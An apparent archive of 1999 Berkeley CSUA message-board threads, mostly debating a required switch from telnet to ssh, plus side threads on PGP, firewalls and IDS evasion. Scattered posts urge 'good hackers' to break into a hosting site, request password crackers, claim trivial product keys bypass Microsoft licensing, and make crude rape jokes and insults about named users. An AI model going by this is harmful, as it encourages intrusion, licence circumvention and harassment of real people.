i haven't tried it yet tell me if it works --oj
\_ YES, it works. just logged in with it. thanks!
no excuses to not use skey now...
\_ How about, "I don't have a Palm Pilot"?
\_ Any source code out there for S/Key?
\_ /usr/src/usr.bin/key/skey.c on soda --dbushong |
| 1999/7/6 [Recreation/Dating, Computer/SW/Security] UID:16085 Activity:nil |
7/6 Do you guys think that http://whitehouse.com shouldn't be what it is? |
| 1999/7/2 [Computer/SW/Security] UID:16057 Activity:high |
7/1 Sorry to bring another ssh question to the motd, but I thought
others might be interested. So my company doesn't have ssh
installed, but there *is* a machine I can telnet out of without
going through the proxy. I compiled ssh over there, and I can't
get it to connect to soda. I checked man pages, and the ssh url
above, but it still dies. Here's the command line and result:
> ssh -a -v -l emarkp http://soda.csua.berkeley.edu
SSH Version 1.2.27 [sparc-sun-sunos4.1.4], protocol version 1.5.
Standard version. Does not use RSAREF.
host183: ssh_connect: getuid 27243 geteuid 27243 anon 1
host183: Connecting to http://soda.csua.berkeley.edu [128.32.43.52] port 22.
host183: connect: Connection timed out
host183: Trying again...
Any ideas on how to fix? -emarkp
\_ ssh on outgoing port 22 on your firewall is blocked,
as in not open.
\_ but emarkp was able to get "ssh-1.5-1.2.26" from telnet pt 22?
\_ woah, they have suns at intel?
\_ ssssh! Don't let anyone else know. :) I don't know how
long this system has been in place. --emarkp
\_ suns are better than intels. and for that matter, so is
everything else. but intels are cheap which is good
enough for my purposes.
Any ideas on how to fix? -emarkp
\_ Hint: try "telnet http://soda.csua.berkeley.edu 22" first.
\_ try it again now that the campus network is back up...
\_ I did. There wasn't even this much when the network was
down. --emarkp
and say hello to mister firewall.
\_ Actually, I got through. That is, it said:
Connected to http://soda.csua.berkeley.edu.
Escape character is '^]'.
SSH-1.5-1.2.26
-- emarkp
\_ Now remove the setuid root bit from ssh. |
| 1999/6/30-7/1 [Computer/SW/Security] UID:16045 Activity:nil |
6/30 Telnet access to Melvyl and Gladis turned off for security
reasons. ssh only.
\_ I thought you did't need a password to get on the library
database. Is that true? If so, why does it matter if it's
secure or not?
\_ Um, have you ever heard of sarcasm? How about trying
"telnet melvyl" yourself to see if this was accurate (it's
not).
\_ Imagine that! Someone sniffing my melvyl login and doing
their own research! Nefarious! |
| 1999/6/30-7/1 [Computer/SW/Security] UID:16040 Activity:moderate |
6/30 I asked another host machine to install a ssh client so that I could
telnet there and then ssh to soda. Thing is, I can't connect
because soda doesn't support ssh protocol v2. Does anyone know
about plans to change this?
\_ there's a slightly easier way to do this and it doesn't involve
asking someone else to install something for you.
\_ when data fellows makes their ssh2 implementation less stupid
about their license.
\_ ssh2 is still in testing and not free for use. Have them install
ssh1 as well.
\_ Ride BIKE!
\_ Compile your own.
\_ Interestingly (to me anyway), this only puts the security breach
one step back. Instead of a cracker sniffing your soda account,
\_ the point is that soda's subnet is filled with lemurs.
they can sniff your other telnet account, and then ssh from there
to soda and wreak all sorts of terrible havok!
\_ Telneting somewhere just to be able ssh to soda is a really
stupid idea. It not only defeats the security that the soda
admins are trying to establish, but also compromises the other
account as well. Get off your ass and install ssh on your owm
machine or explore the possibility of using s/key.
\_ The soda admins are trying to protect against sniffers on this
subnet. Telnet->ssh is no dumber than purely telnet,
and given the number of lemurs probably a bunch safer. |
| 1999/6/28 [Computer/SW/Security] UID:16029 Activity:high |
6/28 The CSUA account is mainly for social use, and it's not a
mission-critical system. I've been using the Soda account for
almost 6 years, and have found it's very convenient since it does
not impose many of the restrictions of regular ISP accounts.
Therefore, I was quite puzzled by the SSH stuff -- I understand
the importance of security, but isn't the CSUA system is a
hacker's system? The decentralized nature of Soda is what made it
wonderful. If the current CSUA leadership wants to impose the
security measures, can you at least ask for feedback and inputs
from the users? I was surprised to see the login message without
hearing anything about the merit of this decision. I suggest for
now, the decision to shut down telnet should be postponed.
\_ I second that motion (even though this thread already ran a few
days ago)
\_ Need to have the rms:rms account turned on. |
| 1999/6/27-7/15 [Computer/SW/Security] UID:16023 Activity:nil |
06/25 IMPORTANT INFORMATION: ************************************************************************ * Secure password software will be REQUIRED starting July 15th, 1999 * ************************************************************************ * Starting July 15th, all remote logins to CSUA Computers will * * require an ssh enabled program for login over the network; * * * * -= STARTING JULY 15th TELNET WILL BE DISALLOWED. =- * * * * For detailed information see: * * /csua/adm/doc/ssh-howto or * * http://www.csua.berkeley.edu/ssh-howto.html * * If you have questions, please mail help@csua * ************************************************************************ |
| 1999/6/25 [Computer/SW/OS/OsX, Computer/SW/Security] UID:16017 Activity:high 66%like:16014 |
6/24 It's about time EECS instructional finally enforced an ssh only policy.
\_ Report them to the Commerce Dept. They're allowing foreigners to
use encryption! That's illegal, the unamerican scum.
\_ Fuck you. --sowings
\_ Oh no, we wouldn't want that to happen would we?
Now for every other machine on campus to follow suit.
\_ ^suit^suite
\_ it's suit, dumbass
\_ Funny, it's rare that we're in the vanguard. You should check
"finger @cory.eecs" though--lots of lusers still stuck with telnet.
--sowings
\_ What the hell is so hard about using ssh? ^telnet^ssh
\_ Part of it may be that users are at a commercial site with
a non-SSH-friendly firewall. --sowings
\_ Not everyone uses an OS that has ssh. Not everyone has
an OS. Don't be so OScentric.
\_ Everybody IS using an OS that can run ssh (no I'm
not talking about Palm Pilots).
\_ I work at a secure site that has a terminal/modem
that I use to dialout to an annex box on campus
and then telnet to soda. Who the fuck are you to
tell me my OS supports ssh? I don't have an OS,
dumbshit.
\_ will EECS install an s/key server? we do that
here for cases like this, because we don't
trust users to protect their reusable passwords.
\_ Furthermore, some of us work behind a firewall which
does not have ssh enabled (I know how stupid that
sounds, but it's true).
\_ I use ssh behind a firewall all the time. Mail root
and tell him what a moron he is for configuring a
firewall improperly.
\_ I would love to use SHH -*BUT*- there is *NO* free ssh for windows
I know you'll all say use linux, but I don't - so there!
\_ There have been free versions for quite a while loser.
http://www.net.lut.ac.uk/psst Get a new excuse.
\_ And given that Window$ versions are already compiled
they have less of an excuse not to use ssh than Unix
people do. Yet the statistics reflect the opposite.
\_ WinBlows twits are stupid. proof: axiom 1.
\_ Windows: http://www.zip.com.au/~roca/ttssh.html
Mac: http://www.lysator.liu.se/~jonasw/freeware.html --dim
\_ TeraTerm? http://depot.berkeley.edu always has free stuff.
\_ Why is ssh free for UNIX but not for Win or Mac? Is it a patent
issue?
\_ porting stuff across unix tends to be very easy (ie. almost
nothing to do) whereas writing a port for Win or Mac is a
total pain in the ass to do. Hence, people who do write
the ports ask for $$$.
\_ They must be evil for not doing it out of the GNUoodness
of their hearts and for the love of technology.
\_ A free port at
http://akson.sgh.waw.pl/~chopin/ssh/index_en.html
\_ just a random check on soda:
netstat -n | awk '($4 == "128.32.43.52.22") {print}' | wc -l
126
netstat -n | awk '($4 == "128.32.43.52.23") {print}' | wc -l
83
--jon
\_ what is port 22 for?
\_ ssh moron
\_ why did this deserve a "moron"? i'm sure at one time
you didn't know what port 22 is for, or even what a
port was.
\_ look in /etc/services moron
\_ Wow, you're a real asshole. The guy knew what
the command line did, but didn't know a lousy port
number and isn't a linux s00per g0r0 like you
so he's a moron? Are you Trevor Buckingham?
\_ No, *I* am Trevor Buckingham!
\_ Please start smoking pot instead of crack.
\_ I am Jean Valjean
\_ My name is Paolo Soto, you got into the
LSCS major, prepare to die. |
| 1999/6/24-25 [Computer/SW/Security, Computer/SW/OS/OsX] UID:16014 Activity:very high 66%like:16017 |
6/24 It's about time EECS instructional finally enforced an ssh only policy.
Now for every other machine on campus to follow suite.
\_ Funny, it's rare that we're in the vanguard. You should check
"finger @cory.eecs" though--lots of lusers still stuck with telnet.
--sowings
\_ What the hell is so hard about using ssh? ^telnet^ssh
\_ Not everyone uses an OS that has ssh. Not everyone has
an OS. Don't be so OScentric.
\_ I would love to use SHH -*BUT*- there is *NO* free ssh for windows
I know you'll all say use linux, but I don't - so there!
\_ Windows: http://www.zip.com.au/~roca/ttssh.html
Mac: http://www.lysator.liu.se/~jonasw/freeware.html --dim
\_ TeraTerm? http://depot.berkeley.edu always has free stuff.
\_ Why is ssh free for UNIX but not for Win or Mac? Is it a patent
issue?
\_ porting stuff across unix tends to be very easy (ie. almost
nothing to do) whereas writing a port for Win or Mac is a
total pain in the ass to do. Hence, people who do write
the ports ask for $$$.
\_ They must be evil for not doing it out of the GNUoodness
of their hearts and for the love of technology.
\_ A free port at
http://akson.sgh.waw.pl/~chopin/ssh/index_en.html |
| 1999/6/22-25 [Computer/SW/Security] UID:16002 Activity:moderate |
6/21 Can anyone give a pointer to a utility that will recover passwords
from a MS Access .mdw workgroup file?
\_ http://www.lostpassword.com -shac
\_ Can anyone give a pointer to a utility that cracks passwords
on Access files? How about Unix /etc/passwd files? MS
installer codes?
\_ MS Install product keys: Try using all 1's. Works every
time I've tried it! Office, DevStudio, SourceSafe, etc.
\_ Some take all 0's instead/as well.
\_ I think only the CS department copies can do that.
Normal Office/DevStudio CDs don't allow that.
\_ UC doesn't get special copies of anything. I've
seen the boxes, installed the software, etc. It's
generic. At least for Office and the OS. Didn't
install DS but the CD's looked the same.
\_ All "4" works on some stuff too.
\_ fdisk. |
| 1999/6/18-19 [Computer/SW/Security, Computer/SW/Unix] UID:15985 Activity:very high |
6/18 How much for a life account on soda?
\_ soda account and having a life are mutually exclusive.
\_ u must FIRST bring back root a SHRUBBERY!
\_ namely marijuana
\_ or MDMA
\_ dissociatives are bad for you.
\_ It's all bad for you.
\_ is this what you learned from government sanctioned
propaganda and programs like D.A.R.E ? You're the kind
that they like, follow directions, don't question
authority and you'll do fine.
\_ No, child, this is what I learned from
watching my girlfriend destroy her life.
You're a prick. Little wannabe druggy
fucks all think they're so smart and anti-
government-conspiracy and all that bullshit.
Well, clue time. You're just a dumb shit
moron burning out your brain and body.
I'm not a child of the DARE generation.
I'm a child of the been-there-knows-that-
first-hand generation.
_/
Then someone of your OBVIOUS wisdom, and intelect
would surely refrain from generalizing comments
like, "it's all bad" I bow before you unending
insight and wisdom, but clearly you can't be
serious about comparing your crack-whore gf to
an occasional pot smoker or social drinker.
\_ You're a prick. Please dope up and drive off a
cliff and drown to death. The world will be a
better place.
\_ First you must get a life. Life accounts are only awarded to those
who graduate with all 5 life points. |
| 1999/6/11-12 [Computer/SW/Security, Computer/HW] UID:15946 Activity:high |
6/11 Thirdvoice again! http://nototv.hypermart.net seems they have added some javascript, and put it into the public domain, that hoses thirdvoice's functionality. they are using refresh loops (KLUDGE) to flush the notes every 1000 milliseconds or something. really screwey, and it has a tendency to crash things. also, thirdvoices server has been hosed today. i am thinking that with each flush, my client tries to get the notes from thirdvoice, then the connection gets abandoned and leaves a zombie http connection that their server takes x tens of seconds to flush out. so, the hypermart people are, in a way, mounting an attack on thirdvoice. probably a great time for any of you good hackers to get into hypermart and fuck shit up. -caliban \_ can't you just hit the Stop button / Escape? \_ All I can say is kludges are just that, kludges. -Judd \_ thirdvoice is really racking up the enemies. Either abovenet died or someone threw a denial of service attack at them. \_ got any more info? -caliban \_ I do. Send a resume. :-) -Judd \_ it was just paranoia -- one of abovenet's cat5000'si 'got confused'. \_ apparently http://www.macosrumors.com has come out against 3v too -caliban \_ I'm tellin you, its all them snooty web designers, who dont want to hear someone making bad comments on their sites. -ERic \_ I'm against hatred and war. Hasn't stopped hatred and war. |
| 1999/6/8-9 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:15917 Activity:high |
6/8 Commentary on third voice:
http://www.macnn.com/contributions/webpages.shtml
\_ can anyone see the notes posted on that page? i have
thirdvoice installed, and it works on other pages. there
are notes posted on that page; thirdvoice pulls up the
topics in their frame but i am unable to read them.
clicking on the note icon in the text does not work.
i get an occasional javascript error, i wonder if they
are hosing the thirdvoice stuff somehow. --caliban
\_ I can read it ok. That's what public betas are for. If you
mail your system details and the URL to feedback@thirdvoice.com
someone will check it out. -Judd
\_ strangely enough that site's annotations are failing in my
3rdvoice client too. -Eric
\_ Watch the web designer weenies whine! They just can't share the
internet.
\_ Amazing! Singaporeans pushing the limits of free speech.
\_ Yeah, go figure! |
| 1999/6/4-5 [Computer/SW/Security] UID:15906 Activity:moderate |
6/4 http://Amazon.com wanx. Amazon lets the publishers have access to customer reviews two days BEFORE they are actually posted, giving them time to write up two or three 'good' reviews the same day the 'not-so-good' review comes out. Eg., look for books written by Steve S. Miller, published by McGraw Hill. His books absolutely suck, but he somehow has all these totally cheesy reviews posted by anonymous readers who all say the same overly complimentary things. Stuff you'd never find on the Soda motd. \_ sounds legal and like standard business practice to me \-while i think this kind of disclosure/discussion is useful, i dont look to amazon for book reviews ... i want one thing from them and that is cheap prices and decent customer service. in my experience "truth" comes out of a dialectic ... from reading multiple sources. generally you shouldnt look for "one relaible source" ... unless it is me or the ecomonist. --psb \_ Uh, The Economist has its idiosyncracies too (e.g., declaring that Clinton should resign the week Monica-gate broke: a little premature, as they themselves later admited) --Economist Reader |
| 1999/5/23-25 [Computer/SW/Security, Computer/SW/Unix] UID:15862 Activity:high |
5/23 Did you hear that Ari and Christine are married?
\_ "If you need to ask, you don't know."
\_ Why should we care?
\_ How many times have we heard about this?
\_ Which Christine? (Which login?)
\_ the one with 3 different logins because she can't make
up her mind.
\_ The one that's been living with ari for years. If you
don't know her login, you don't know her and don't need
to know. (Hint: If you pay any attention to walls, you
know who.)
\_ Why does anyone care? Just shut up. It's not like, "Did
you hear Ari and Christine are tag team serial killers?"
\_ This is outrageous. There is no evidence that
Christine has help Ari with any of his crimes,
especially not serial killing.
\_ there's a website out there of her holding down
twaung while ari rapes him
\_ http://www.networkgen.com/~twaung/images/bean1.jpg
\_ Damn! I got 403 Forbidden.
\_ what kind of lamer puts an image in
his PUBLIC HTML "images directory, then
revokes view privilege for it? Either
have it there, or not. sheesh.
\_ I thought it was Ari holding him down while
xtine raped him.
\_ I just want to check out her pics if she has a home page,
to see how lucky/unlucky Ari is.
\_ Ari is filthy rich, Christine is a lot hotter than
your hand, you just lose in comparison.
\_ I dunno dood....My hand is pretty good looking.
\_ ~chris
\_ Boy-child, luck has nothing to do with it. The
sooner you get over that idea, the sooner you'll
be making love to a woman instead of your hand.
\_ And if you're Ari, this will include cheating
too.
\_ What? Do tell!
\_ That was what I thought until I have this
hot babe fall from the sky.
\_ What'd she weigh? Or did you let her
bounce a few times first? |
| 1999/5/20-21 [Computer/SW/Security] UID:15848 Activity:nil 66%like:16541 |
5/20 Access to Software for All People jobs is /csua/pub/jobs/ASAP |
| 1999/5/19-20 [Computer/SW/Security, Computer/SW/Unix] UID:15840 Activity:high |
5/19 Dear root
It would be really cool if you could remove all the old job
listings from /csua/pub/jobs, I'd be more than happy to do
it myself but my BSD security compromising fu is lacking.
You see I need to find a job so I can afford an NT license,
I can't get any work done without that wonderfull paperclip
helping me along the way. Thank you very much and may god
love you for ever. job-less on CSUA
\_ find a headhunter. try http://dice.com
\_ Wired is hiring. http://www.hotwired.com/jobs good luck.
\_ ls -l will tell you when a company's job listing was
last fiddled with. Old listings' job openings probably
don't exist, but the company probably still does. If
the company sounds interesting, try their website. |
| 1999/5/17-18 [Academia/Berkeley/CSUA, Computer/SW/Security, Computer/SW/Unix] UID:15822 Activity:kinda low |
5/17 PLEASE clean up your old crap in the /csua/pub/job dir!
\_ I'd like to, but all the files and dirs I put there before are now
owned by root.
Darth Maul kills Qui-Gon.
\_ root would be happy to help you with this problem. |
| 1999/5/15 [Computer/SW/Security, Computer/SW/Unix] UID:15815 Activity:high |
5/15 It's the "Message Of The Day", not "Messages Of Last Week".
If you don't want it nuked, start something fresh.
\_ It's also not the standard root-only motd. You want it wiped
once a day, petition root to make a cron job. Since you obviously
don't "get it", just use a .hushlogin and leave the rest of us
alone.
\_ I don't want it wiped once a day, I want it to not be full of
stupid trollfests from a week ago that keep getting replaced
by the original trollers.
\_ Dumbshit, nothing on the motd was more than 48 hours old. Get
a fucking calendar.
\_ maybe ERic should stop rcsing the motd. That is how poeple
get old copies to replace it with.
\_ No it isn't. It is actually possible to save a copy yourself.
This may come as a stunning revelation to you, but the cp
command isn't root only. |
| 1999/5/7 [Computer/SW/Security] UID:15769 Activity:high |
5/6 /usr/local/bin/premail is installed.
It connects to the "nym" remailer.
It requires pgp2.6 to work.
The nym server uses a 2048 bit key.
Ours only supports 1024 bit keys.
\_
jon@soda:~ ttyRP 1:19:07am 6% pgp -kg
Pretty Good Privacy(tm) 2.6.2 - Public-key encryption for the masses.
(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 11 Oct 94
Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc.
Distributed by the Massachusetts Institute of Technology.
Export of this software may be restricted by the U.S. government.
Current time: 1999/05/07 08:22 GMT
Pick your RSA key size:
1) 512 bits- Low commercial grade, fast but less secure
2) 768 bits- High commercial grade, medium speed, good security
3) 1024 bits- "Military" grade, slow, highest security
Choose 1, 2, or 3, or enter desired number of bits: 2048
Generating an RSA key with a 2048-bit modulus.
--I dont know who the fuck you are, but 1) you didnt mail root
and 2) you arent even smart enough to read the fucking directions
that pgp gives you on a fucking silver platter. --Jon
\_ Valium, homeboy. He probably meant that pgp supports a
maximum 1024 bit keylength. -John
\_ but it doesn't.
\_ Yes, I know that, and you know that, but it didn't
show up in the options and he was probably tired
and didn't think that far. No reason to go apeshit.
-John "fuck"
\_ wierd. tried again, it worked now. BUt it
failed before, complaining aobut keylength.
\_Why is soda stuck on 2.6.2? PGP 5 is available for *NIX, with 6
available within the month. 6 supports 4096-bit keys, which if you
read Cryptonomicon (Neal Stephenson's new book) is secure for 100 years
and may even be suitable to keep secure until men are no longer
capable of evil! (forever). As far as I know, the book does not have
a protagonist who attended UCB in the 90's and studied CS (as snow
crash did) --cody
\_
/usr/local/bin/pgp /usr/local/bin/pgpencrypt
/usr/local/bin/pgp5 /usr/local/bin/pgpk
/usr/local/bin/pgp_old /usr/local/bin/pgps
/usr/local/bin/pgpdecode /usr/local/bin/pgpshow
/usr/local/bin/pgpe /usr/local/bin/pgpsign
/usr/local/bin/pgped /usr/local/bin/pgpv
--Jon. Hint Hint, it is possible to have both installed. |
| 1999/4/5 [Computer/SW/Security] UID:15695 Activity:high |
4/5 If sshd does host authentication for .shosts files why do people still
say that .shosts is still insecure. This is assuming that all the
entries point to a computer that I maintain and I am the only user
on that system.
\_ how do i use shosts? is it the same as rhosts?
\_ if someone breaks into that system, they can steal the host
key. But .shosts is reasonably secure. -tom
\_ How secure is having tcp-wrappers blocking all external
connections and running this computer on a ppp dialup
connection that times out after 15 minutes of inactivity.
I'd think it would be pretty obvious if someone broke in.
\_ tcpwappers probably doesn't wrap all your services. -tom |
| 1999/3/30-31 [Computer/SW/Security, Computer/SW/OS/Windows] UID:15662 Activity:nil |
3/30 In a /lib /usr/lib directory what's the diff between a lib*.a and
a lib*.so file?
\_ .a is "archive" and produces static (compile-time) linking, while
.so is "shared object" and produces dynamic (run-time) linking.
\_ so what the heck is "linking"?
\_ man ld
\_ well, if you're a DOS weenie, a .so file is like a .DLL file
in short: .a files are things that get added to your program
when you compile it; people don't need them to run the
executable, but it's huge. .so files get "added" (linked)
when a person runs the program, so they need to have copies
of them, but the executable is smaller. generally .so
(shared libraries) are better because then 100 programs on
your machine can use one library without (essentially) having
100 copies of the library present in every executable -dbushong |
| 1999/3/29-30 [Computer/SW/Security] UID:15652 Activity:moderate |
3/29 Is there a cel phone service in the area that lets me call in the
entire state? I want to be able to use it both here and Los Angeles.
-- brendal
\_ yes. have you even looked at any of the service providers yet
at all? cellone and gte have both been advertising this sort
of option heavily. the former lets you call from anywhere in
california but hasn't come out with a nationwide plan yet. gte
has a national onerate service plan.
\_ Pacbell PCS does it if you get an extra $20/month plan named
WildFire. GTE does not do it. L.A. is roaming at 0.40/min.
Sprint does it but has no coverage on the long-distance freeways.
PacBell and CellOne are the solid west-coast choices. Otherwise
GTE or Sprint would be cheaper if you are on the east coast too. |
| 1999/3/29-30 [Computer/SW/Languages/C_Cplusplus, Computer/SW/Security] UID:15649 Activity:moderate |
3/29 How do I test to see if a file has "other" +"read" permissions in C?
\_ man 2 stat?
\_ or check out the access(2) manpage.
\_ stat doesn't have anything to do with accessibility and access uses
user ID to check for access
\_ which part of "mode" don't you understand?
\_ stat has this:
mode_t st_mode /* File mode */ |
| 1999/3/12-13 [Computer/SW/Security] UID:15584 Activity:nil |
3/11 There's ssh and scp. Is there sftp? I want to interactively get
and put a file. scp is rather inconvenient.
\_ DataFellows ships an sftp but it's just making an ssh tunnel
to the ftp-cmd channel for you to use. It only secures the
command channel and requires that you have some account on the
remote machine. Due to the design of the ftp protocol, it
is difficult to secure the data channel, though there are ways to
do this that involve a bit of work on the part of an administrator.
--jon
\_ I'm sure you could just write a little script called sftp that
would establish a secure channel and tunnel ftp automatically.
\_ no, you can not do it with a simple shell script for
the data channel. The command channel is simple, data is
not with most of the unix ftp clients available.
\_ in many cases, you need to hack the ftp client from source
(or edit raw binary for the truly fooful) to get it to
use arbitary host:port's for the data channel (you need to
use ftp's passive mode btw). There is a way to combine both
the data and command channel for easier forwarding through
a novel use of a socks proxy. This is the "bit of work" to
which I earlier referred. --jon
\_ Most people only really care about securing the command
channel because of the password. If you were working
on something top secret, however, that would be a diff
story and you should just use the inconvenient scp.
\_ How about:
ssh -f -L 1234:csua.berkeley.edu:23 http://csua.berkeley.edu
sleep 20 </dev/null >/dev/null
as adapted from the fetchmail manpage?
\_ What about writing an expect script to transfer files using
ssh? For example, if I want to get a file to my machine
from soda I can do:
ssh soda -C cat filenameOnSoda > fileNameOnMyMachine
You can use the same trick to send a file. You could
write a script that would also let you do ls and other
stuff too. -emin
\_ the nice thing about a "secure ftp" is that you
amortize the cost of the SSH authentication process
over the transfer time of a number of files rather
then once for each file transferred, and yet you
can still deal with files on a individual, interactive
basis. Doing ls via another ssh-wrapper would just
add to the number of ssh-authentications needed, which
for some users is a high cost. --jon
\_ Try SRP. It provides a secure ftp and ftpd, along with a few other
cool security features.
\_ Can someome who has looked at SRP explain what it is about? |
| 1999/3/10-11 [Computer/SW/Security] UID:15574 Activity:very high |
3/9 Given all the network sniffing that goes on, how about turning off
telnet and rlogin on soda and force everybody to use ssh? I think
the cost of dealing with ssh problems outweighs the consequences of
a break-in. What do you guys think?
\_ no ssh installed on UCB dialup CLI connections
\_ I honestly have to wonder how many people still use CLI
from the annexen. --sowings
\_ All the lazy people who don't want to bother to setup ppp.
\_ Discriminates against our non-US-citizen members who we legally
aren't allowed to let use ssh/sshd. (Stupid US goverment fucknuts)
\_ sshh...you don't want to make fun of the US govt. They might
be watching the motd and consficate soda.
\_ You're wrong; the most popular implementations of SSH for all
major platforms (Windows/Mac/Unix) are developed and sold
outside of the US. The US is starting to lag, not lead, in
crypto software, because of crypto export laws.
\_ So. That has nothing to do with the CSUA violating the
law everytime it allows a non-citizen to use encryption
software - even if they downloaded ssh on their own, it's
useless without the sshd software running on soda.
\_ I know of a supercomputer center run by the government and
foreign users connecting to that system MUST use ssh.
If it's OK for them, it's probably OK for soda. --peterM
\_ There is no free SSH client for Windoze, to my knowledge
-muchandr
\_ http://www.zip.com.au/~roca/ttssh.html --dim
\_ F-Secure SSH seems to be free as well.
\_ only for 30 day trial
\_ Then you should look at http://www.net.lut.ac.uk/psst
and learn much...
\_ http://www.ocf.berkeley.edu/~tee/ssh
\_ who cares?
my ssh key into an sshd on a machine run my people i dont
\-I think this is an insane idea. I dont want to type
my ssh key into an sshd on a machine run by people i dont
know and i dont trust ... and I would rather not set up a
"low security" ssh key in addition to my regular one.
given all the network sniffing that goes on, use rhosts
and dont trust soda on machines you care about.
What are you going to do about the XDM machines?
I disagree with your cost-benefit analysis. The cost of a
compromised passwd isnt that high. The cost of a compromised
ssh key is high. For one thing, the hacker can hide from IDS
systems. I wont go on any more. It was reasonable to float
this balloon, but crazy to jump on it. --partha "i watch the
net" banerjee
\_ you never ever type your ssh-passphrase to
a remote process. the remote sshd, when you use
RSAAuthentication, provides you a challenge to which you
respond. That response is the equivalent of doing an
RSA encrypt with your private key which the remote
sshd tries to decrypt with the public key you deposited
on the remote host earlier. If what the remote sshd
obtained by decrypting your response with your public
key and and the original challenge coincide, then you
are authenticated. Of course, if you do not trust
RSA, and think someone may use your public key to obtain
your private key and the pass prase you use to further
protect it against local machine attacks, thats another
story. --jon
\_ Oh great psb, please sniff my network in a sexual way.
-psb #1 fan
\_ Poser. The real -psb #1 Fan
\_ Uh, partha, you do realize that you don't need to use
RSA authentication to still get most of the benefits
of ssh.
\- yes but realistically you see more trojaned
clients and daemons than seq number or spoof attacks.
my point was this imposes a reasonable cost for people
who log in from a lot of different machines.
\_ It would be pretty obvious if you had logged into
a trojaned sshd server. In addition to the server
authenticating you the client also authenticates
the server and spews a nasty message if the
authentication fails.
\_ What do seq number or spoof attacks matter? The
attacks we see daily on campus are packet sniffers.
ssh eliminates the threat of packet sniffing
script kiddies, whether or not you use RSA
authentication. -tom
\_ I think he is saying that he believes one is
better off using rlogin and .rhosts as
attacks spoofing a connection from a
trusted host or attempting to hijack your
connection are rarer than trojan attacks.
--sky
\_ Do you passively sniff traffic or do you run the IDS
on a gateway and dynamically block packets? If you are
just passively watching the traffic, until TCP/IP
stacks are standardized, your IDS can be circumvented 7
ways to sunday. Its so easy to inject packets that will put
the IDS and the target host's stack in inconsistant states.
How do you deal with something as simple as TTL? --sky "i
0wn j0r n3t w1th my 31337++ hAx0r sk1LLz" king
\-the TTL problems is in fact tricky and really
basically intractible. i think we are cleverer than you
think. i cant discuss exactly what we do, but if you have
some attack based on ttls ot fragmentation or whatever,
anything stealthy, as opposed to a flood/DoS, we would be
interested in talking to you to see if you can evade our
monitor. the commercial monitor cos are just interested in
profit maximizing ... so if it would take a huge effort
to fix something and lacking that one thing isnt hurting
their sales much, then they wont fix it/ for example a major
IDS which will remain nameless only keeps 3minutes of "state",
which means if you just control-z a connection for 3min, you
have probably evaded the monitor. anyway, if you are serious
drop us a note. i am not going to publicly comment on the
non-passive part of the monitoring. --psb
\_ Yeah. We have a whole library of scripts written
in a custom language for sending and receiving raw
net traffic that we use for OS fingerprinting,
firewall penetration testing, and IDS circumvention.
We have a collection of scripts whose purpose is to
exploit descripencies in stack implementation so that
the IDS and the target systems state become disjoint,
allowing us to insert evil data w/o the IDS detecting it.
It would be interesting to see how BRO handles under
these conditions. --sky
\_ "non-passive": guys in full-length black Kevlar suits
with BIG GUNS
\that's "big *fucking* guns" to you. --psb
\_ Um, this whole conversation has me completely lost.
Any sources to strengthen my security/network fu?
\_ How about just forcing telnetd/rlogind users to use one-time
passwords until they can be elite enuf to use some kind of encrypted
login system?
\_Is using ssh w/o sshd a waste of time?
\_ sshd is the server; ssh is the client.. they're pretty
useless without each other. You probably meant
"w/o ssh-agent" And no, ssh is still useful without
ssh-agent, whatever psb might think about the impossiblity
of ssh password authentication --dbushong
\-i dont even know what "the impossibility of ssh
passwd authentication means". the only think i said
was close if not actually impossible was for a passive
monitor upstream from a destination host to replicate
the stream it would see if it were in a different
point in "net space". aka "the TTL attack". --psb
\_ some silly places have ssh set up to automatically call
rlogin when the target host is not running sshd. this
is a completely useless way to run ssh, and might
screw you one day when you're tired and not noticing that
this time your connection is not encrypted.
\_ You implied in your original post that you need to
generate an ssh key in order to use ssh, which is not
true. --dbushong
\-BTW, is anyone familiar with the stuff at
<DEAD>srp.stanfraud.edu<DEAD>? --psb
\_ Yes. mconst was thinking of patching it into
ssh one of these days. --dbushong |
| 1999/2/24 [Computer/SW/Security] UID:15469 Activity:nil |
2/23 HELP TURN BAY BRIDGE FRAUD ON IT'S HEAD!!!!
One-click E-Z activism:
<DEAD>users.lanminds.com/~jmeggs/baybridge.html<DEAD>
Cool editorial in SF Chronicle today:
http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/1999/02/23/ED54484.DTL |
| 1999/2/19-21 [Computer/SW/Security] UID:15449 Activity:low |
2/19 Don't buy from Site For Sore Eyes. Besides being incompetent,
overpriced, and complete liars ("Your insurance will cover it."),
their service sucks and their warranty is virtually useless.
\_ Try "For Eyes". Prices are fairly reasonable and service is
very friendly. They also have a good warrenty on their stuff.
\_ "For Eyes" will also fix your b0rken eyewear free of charge
even if you didn't buy it there...if it can be fixed. |
| 1999/2/1-2 [Computer/SW/Security, Recreation/Media] UID:15340 Activity:low |
2/1 http://www.infobeat.com/stories/cgi/story.cgi?id=2558287745-883 At&t phone service over cable tv cables. \_ would you trust people who can't even keep up their own web site? and who can't promise a representative will get back to you sooner than "sometime in the next 24 hours"? |
| 1999/1/28-29 [Computer/SW/Security] UID:15310 Activity:moderate |
1/27 Why isn't biff working? Why isn't comsat running?
\_ because comsat is a stupid idea and a security hole.
\_ What kind of security holes exist? Can't we just use
pam.d to block all comsat access EXCEPT 127.0.0.1?
\_ root compromises from 127.0.0.1 are still root compromises.
\_ just run philbiff +lots, its much coooler. -ERic
\_ use "newmail"
\_ Procmail and a few lines of perl works better. |
| 1999/1/26-29 [Computer/SW/Security] UID:15296 Activity:kinda low |
1/26 Is it possible to SSH out through a firewall to, say, soda? For
some reason, my connection keeps timing out.
\_ depends on the firewall and the ssh installation.
\_ try ssh -v, ssh -P, and ssh -v -P
\_ Is it possible they blocked outgoing connections. As the above
said, it depends.
__
/ \
/ ..|\
(_\ |_)
/ \@' Woof! Damn your mom was good.
/ \@' Woof! Damn yer mom was good.
/ \
_ / ` |
\\/ \ | _\
\ /_ || \\_
\____)|_) \_)
\_ stay! good doggie.
__
/ \
/ ..|\
(_\ |_)
/ \@'
/ \
_ / ` |
\\/ \ | _\
\ /_ || \\_
\____)|_) \_) |
| 1999/1/21-23 [Computer/SW/Security] UID:15276 Activity:nil |
1/21 Rewling ssh/telnet client for winblows...
http://www.vandyke.com
\_ Better ssh/telnet client for windows, and this one's free:
http://www.zip.com.au/~roca/ttssh.html |
| 1999/1/17-18 [Computer/SW/Security] UID:15246 Activity:kinda low |
